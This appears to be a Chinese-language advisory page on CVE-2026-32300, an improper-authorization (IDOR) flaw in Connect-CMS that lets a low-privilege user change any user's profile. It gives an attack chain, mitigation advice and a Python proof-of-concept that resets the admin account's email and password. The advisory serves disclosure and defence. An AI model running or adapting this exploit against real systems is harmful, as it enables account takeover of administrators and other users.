CVE-2026-32300 CVSS 8.1 高危

CVE-2026-32300 Connect-CMS越权修改用户信息漏洞

披露日期: 2026-03-23

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-32300

漏洞类型

越权漏洞

CVSS评分

8.1 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Connect-CMS

漏洞概述

Connect-CMS是一款内容管理系统。在1.41.0及以下版本和2.41.0及以下版本中，系统的“My Page”个人资料更新功能存在不当授权问题。由于缺乏严格的权限校验，低权限攻击者可以利用该漏洞修改任意用户的信息。该漏洞可能导致用户账户被劫持或敏感信息泄露。官方已在1.41.1和2.41.1版本中修复了此问题，建议受影响用户尽快升级。

技术细节

该漏洞源于Connect-CMS在处理“我的页面”个人资料更新请求时，未正确验证当前请求用户是否拥有目标账户的修改权限，属于典型的IDOR（不安全的直接对象引用）漏洞。攻击者首先需要注册一个低权限账户并登录以获取有效的会话令牌。在登录后，攻击者可以拦截或构造发送至服务器端的更新个人资料的HTTP请求。通过修改请求中的用户ID参数（例如将目标用户的ID替换为管理员或其他用户的ID），攻击者可以欺骗后端服务器执行针对目标用户的数据更新操作。由于系统仅验证了会话的有效性，而未验证会话主体与操作对象的一致性，导致服务器接受了非法的修改请求。这种越权访问允许攻击者重置目标用户的密码、更改邮箱或修改其他关键个人信息，进而可能接管账户权限。

攻击链分析

STEP 1

侦察

识别目标是Connect-CMS系统，且版本在受影响范围内（1.x <= 1.41.0 或 2.x <= 2.41.0）。

STEP 2

获取访问权限

攻击者在系统中注册一个普通用户账户，或使用已有的低权限账户登录系统，获取有效的Session Cookie。

STEP 3

漏洞利用

攻击者分析“My Page”更新功能的请求，抓包并修改其中的用户ID参数（如将ID改为管理员ID），发送篡改后的请求。

STEP 4

达成影响

由于服务端未校验当前用户是否有权修改该ID对应的资料，服务器接受请求并修改了目标用户（如管理员）的信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests # Target configuration target_url = "http://target.com" login_endpoint = "/index.php?account=login" update_endpoint = "/index.php?account=my_page/update" # Attacker credentials attacker_user = "lowpriv_user" attacker_pass = "password" # Create a session to maintain cookies session = requests.Session() # Step 1: Authenticate as a low-privileged user login_payload = { "account": attacker_user, "password": attacker_pass } response = session.post(target_url + login_endpoint, data=login_payload) if response.status_code != 200: print("[!] Login failed") exit() print("[+] Login successful") # Step 2: Exploit Improper Authorization (IDOR) # The attacker attempts to update the profile of user_id '1' (usually Admin) # by sending a crafted request to the 'My Page' update feature. exploit_payload = { "user_id": "1", # Target user ID to modify "email": "[email protected]", "password": "new_hacked_password" } print(f"[*] Attempting to modify user_id 1 profile...") exploit_response = session.post(target_url + update_endpoint, data=exploit_payload) if exploit_response.status_code == 200 and "success" in exploit_response.text.lower(): print("[+] Exploit successful! Arbitrary user information modified.") else: print("[-] Exploit failed or patch is applied.")

影响范围

Connect-CMS 1.x <= 1.41.0

Connect-CMS 2.x <= 2.41.0

防御指南

临时缓解措施

如果无法立即升级，建议暂时禁用用户自助修改资料的功能，或者在WAF/应用网关层增加规则，拦截请求参数中包含非当前会话用户ID的更新请求。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表